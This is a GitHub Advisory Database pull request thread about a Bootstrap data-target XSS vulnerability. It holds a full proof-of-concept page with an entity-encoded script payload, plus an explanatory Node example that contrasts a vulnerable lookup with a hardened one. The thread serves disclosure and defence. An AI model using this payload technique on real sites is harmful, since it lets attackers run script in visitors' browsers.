
[GHSA-4p24-vmcr-4gqj] Bootstrap XSS vulnerability #3281

Conversation

roka-actico

Updates

  • Affected products
  • Description
  • References

Comments
We used the demonstration example from twbs/bootstrap#20184 (comment) and proved that version 2.0.4 and above are also affected, but 2.0.3 and below are not; see https://jsbin.com/dahojakupe/edit?html,output

@github-actions github-actions bot changed the base branch from main to roka-actico/advisory-improvement-3281 January 12, 2024 13:56
@darakian (Contributor)

darakian commented Jan 12, 2024

Many thanks for the POC and the PR. For the sake of archiving it, the POC follows in this post. I'll add this thread as a reference rather than your jsbin link.

POC

```html
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <title>Bootstrap Bug Report</title>

    <!-- Bootstrap's CSS -->
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/2.0.4/css/bootstrap.css" rel="stylesheet">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/latest/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/latest/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>
    
    <!-- Follow these instructions, please! -->
    <div class="container">
      <h1>Test-case for Bootstrap bug #20184</h1>
      <p class="lead">
        <a href="https://github.com/twbs/bootstrap/issues/20184">#20184 – XSS in data-target attribute</a>
      </p>
      <p class="lead">
        <!-- Intended use: data-target is a CSS selector for a modal already in the document -->
        <button class="btn btn-modal btn-lg btn-primary" data-toggle="modal" data-target=".modal.the-good">Show the good modal</button>
        <br>
        Demonstrates intended use of <code>data-target</code> attribute.
      </p>
      <p class="lead">
        <!-- Questionable use: the attribute holds entity-encoded markup. The browser decodes it
             to a <div ...> string, which Bootstrap then passes to jQuery's $(), so the modal is
             built from the attribute value instead of looked up by selector. -->
        <button class="btn btn-modal btn-lg btn-primary" data-toggle="modal" data-target="&#x3C;div class=&#x22;modal fade the-bad&#x22; tabindex=&#x22;-1&#x22; role=&#x22;dialog&#x22;&#x3E;&#x3C;div class=&#x22;modal-dialog&#x22; role=&#x22;document&#x22;&#x3E;&#x3C;div class=&#x22;modal-content&#x22;&#x3E;&#x3C;div class=&#x22;modal-header&#x22;&#x3E;&#x3C;button type=&#x22;button&#x22; class=&#x22;close&#x22; data-dismiss=&#x22;modal&#x22; aria-label=&#x22;Close&#x22;&#x3E;&#x3C;span aria-hidden=&#x22;true&#x22;&#x3E;&#x26;times;&#x3C;/span&#x3E;&#x3C;/button&#x3E;&#x3C;h4 class=&#x22;modal-title&#x22;&#x3E;The Bad Modal&#x3C;/h4&#x3E;&#x3C;/div&#x3E;&#x3C;div class=&#x22;modal-body&#x22;&#x3E;This modal&#x27;s HTML source code is declared inline, inside the data-target attribute of its show-button&#x3C;/div&#x3E;&#x3C;/div&#x3E;&#x3C;/div&#x3E;&#x3C;/div&#x3E;">Show the bad modal</button>
        <br>
        Demonstrates questionable use of <code>data-target</code> attribute.
      </p>
      <p class="lead">
        <!-- Misuse (XSS): same mechanism, but the decoded markup is a <script> element. When
             Bootstrap appends the "modal" it built to the body, the script executes. -->
        <button class="btn btn-modal btn-lg btn-primary" data-toggle="modal" data-target="&#x3C;script&#x3E;alert(&#x22;Owned! An attacker, who can inject a data-target attribute into the document, now has full control over the JS!\nThis is an XSS vulnerability, even though all HTML source-code is properly encoded. The browser parses it, then Bootstrap passes the decoded value back for another round of HTML parsing.&#x22;)&#x3C;/script&#x3E;">Show the ugly modal (XSS)</button>
        <br>
        Demonstrates misuse of <code>data-target</code> attribute.
      </p>
    </div>
    
    <div class="modal fade the-good" tabindex="-1" role="dialog">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <h4 class="modal-title">The Good Modal</h4>
          </div>
          <div class="modal-body">
            This modal is declared right in the HTML document. The show button references it via a CSS selector.
          </div>
        </div>
      </div>
    </div>

    <!-- jQuery and Bootstrap's JavaScript -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/2.0.4/js/bootstrap.js"></script>
  </body>
</html>
```
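The POC above hinges on two parsing rounds: the HTML parser decodes the character references in the `data-target` attribute, and the modal data-API then hands the decoded string to jQuery's `$()`, which treats any string beginning with `<` as markup rather than a selector. The following is an added example, not code from this PR, from the POC or from Bootstrap: it models that dispatch in Node without a browser, shows the vulnerable lookup beside a hardened one that only ever interprets the value as a selector, and runs all three POC targets through both. The entity decoder, the `SIMPLE_SELECTOR` allowlist and the `POC_TARGETS` values are constructed for this example; the `rquickExpr` regex is the one jQuery core uses to classify `$(string)` arguments.

```javascript
// Added example (not code from the PR, the POC, or Bootstrap): a browser-free model of
// the two parsing rounds behind the data-target XSS in the POC above.
//
// Round 1: the HTML parser decodes character references in the attribute value, so the
//          entity-encoded payload becomes "<script>...</script>" in the DOM.
// Round 2: the modal data-API hands that decoded string to jQuery's $(), which treats
//          any string that starts with "<" as markup to build rather than a selector.

// Tiny attribute-value decoder covering the references the POC uses (numeric hex,
// numeric decimal and a few named ones). Constructed for this example; a browser
// handles the full entity table, but the single-pass behaviour is the same: the
// decoded text is never decoded again, so "&#x26;times;" becomes "&times;", not a "x".
const NAMED = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", times: '\u00d7' };
function decodeAttr(value) {
  return value.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));/gi, (whole, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : whole;
  });
}

// jQuery core's dispatch regex for $(string): group 1 captures HTML, group 2 a bare "#id".
// Anything that does not match is handed to the selector engine.
const rquickExpr = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;
function jqueryStringKind(str) {
  const m = rquickExpr.exec(str);
  return m && m[1] ? 'html' : 'selector';
}

// Vulnerable lookup, mirroring the shape of the data-API: the decoded attribute value
// goes straight into $(). If it classifies as 'html', jQuery builds the nodes, and the
// modal plugin appending them to <body> is what runs an injected <script>.
function resolveTargetVulnerable(rawAttr) {
  const decoded = decodeAttr(rawAttr);
  return { kind: jqueryStringKind(decoded), value: decoded };
}

// Hardened lookup: the value is only ever interpreted as a CSS selector. In a browser
// that is $(document).find(sel) or document.querySelector(sel), both of which reject
// "<script>..." as a selector syntax error. Offline, the selector grammar is approximated
// by a constructed allowlist of the simple forms modal targets use (type, .class, #id,
// descendant/child/sibling combinators); attribute selectors are deliberately outside it.
const SIMPLE_SELECTOR = /^\s*[A-Za-z0-9_.#\-]+(?:\s*[\s>+~]\s*[A-Za-z0-9_.#\-]+)*\s*$/;
function resolveTargetHardened(rawAttr) {
  const decoded = decodeAttr(rawAttr);
  if (!SIMPLE_SELECTOR.test(decoded)) {
    throw new Error('data-target is not a selector: ' + JSON.stringify(decoded.slice(0, 40)));
  }
  return { kind: 'selector', value: decoded };
}

// The three data-target values from the POC, as they sit in the HTML source
// (the "bad" payload is shortened to its outer element).
const POC_TARGETS = {
  good: '.modal.the-good',
  bad: '&#x3C;div class=&#x22;modal fade the-bad&#x22;&#x3E;&#x3C;/div&#x3E;',
  ugly: '&#x3C;script&#x3E;alert(&#x22;Owned!&#x22;)&#x3C;/script&#x3E;',
};

// Runs every POC target through both lookups; 'rejected' marks a hardened-path refusal.
function summarize() {
  const out = {};
  for (const [label, raw] of Object.entries(POC_TARGETS)) {
    let hardened;
    try { hardened = resolveTargetHardened(raw).kind; } catch (e) { hardened = 'rejected'; }
    out[label] = { vulnerable: resolveTargetVulnerable(raw).kind, hardened };
  }
  return out;
}

console.log(summarize());
```

The important property of the hardened path is not a blocklist on `<`: it never offers the attribute value to an API that might parse HTML, so the classification step in round 2 cannot happen. `SIMPLE_SELECTOR` stands in for the selector parser here only because Node has no `querySelector`; in a page, let the real selector engine do the rejecting.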

@advisory-database advisory-database bot merged commit 56ab059 into roka-actico/advisory-improvement-3281 Jan 12, 2024
@advisory-database (Contributor)

Hi @roka-actico! Thank you so much for contributing to the GitHub Advisory Database. This database is free, open, and accessible to all, and it's people like you who make it great. Thanks for choosing to help others. We hope you send in more contributions in the future!

@advisory-database advisory-database bot deleted the roka-actico-GHSA-4p24-vmcr-4gqj branch January 12, 2024 20:20